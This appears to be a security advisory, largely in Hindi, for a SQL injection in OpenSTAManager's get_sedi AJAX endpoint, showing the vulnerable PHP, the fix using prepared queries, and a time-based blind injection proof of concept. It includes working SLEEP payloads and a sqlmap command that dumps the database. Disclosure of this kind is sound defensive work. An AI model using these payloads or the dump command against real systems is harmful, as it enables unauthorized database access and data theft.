
CVE-2025-69213 - OpenSTAManager has a SQL Injection in ajax_complete.php (get_sedi endpoint)
| क्षेत्र | विवरण |
|---|---|
| CVE ID | CVE-2025-69213 |
| गंभीरता | उच्च |
| सलाह | सलाह देखें |
| द्वारा खोजा गया | Lukasz Rybak |
ajax_complete.php एंडपॉइंट में 'get_sedi' ऑपरेशन को संभालते समय एक SQL इंजेक्शन भेद्यता मौजूद है। एक प्रमाणित हमलावर idanagrafica पैरामीटर के माध्यम से दुर्भावनापूर्ण SQL कोड इंजेक्ट कर सकता है, जिससे अनधिकृत डेटाबेस पहुंच हो सकती है।
फ़ाइल: modules/anagrafiche/ajax/complete.php:28
case 'get_sedi':
$idanagrafica = get('idanagrafica');
$q = "SELECT id, CONCAT_WS( ' - ', nomesede, citta ) AS descrizione
FROM an_sedi
WHERE idanagrafica='".$idanagrafica."' ...";
$rs = $dbo->fetchArray($q);
$_GET['idanagrafica'] → get('idanagrafica')$dbo->fetchArray($q) दुर्भावनापूर्ण क्वेरी को निष्पादित करता हैमैनुअल PoC (समय-आधारित ब्लाइंड SQLi):
GET /ajax_complete.php?op=get_sedi&idanagrafica=1' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a) AND '1'='1 HTTP/1.1
Host: localhost:8081
Cookie: PHPSESSID=<valid-session>
SQLMap शोषण:
sqlmap -u "http://localhost:8081/ajax_complete.php?op=get_sedi&idanagrafica=1*" \
--cookie="PHPSESSID=<session>" \
--dbms=MySQL \
--technique=T \
--level=3 \
--dump
SQLMap आउटपुट:
[INFO] URI parameter '#1*' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
Parameter: #1* (URI)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: idanagrafica=1' AND (SELECT 2572 FROM (SELECT(SLEEP(5)))oOnc)-- rhVF
back-end DBMS: MySQL >= 5.0.12
zz_users तालिका का संशोधनSELECT ... INTO OUTFILE के माध्यम सेप्रत्यक्ष संयोजन को तैयार कथनों से बदलें:
पहले:
$idanagrafica = get('idanagrafica');
$q = "SELECT ... WHERE idanagrafica='".$idanagrafica."' ...";
बाद में:
$idanagrafica = get('idanagrafica');
$q = "SELECT ... WHERE idanagrafica=".prepare($idanagrafica)." ...";
द्वारा खोजा गया: Łukasz Rybak
यह CVE समन्वित भेद्यता प्रकटीकरण प्रथाओं के अनुसार जिम्मेदारी से प्रकट किया गया था। यहां प्रदान की गई जानकारी केवल शैक्षिक और रक्षात्मक उद्देश्यों के लिए है।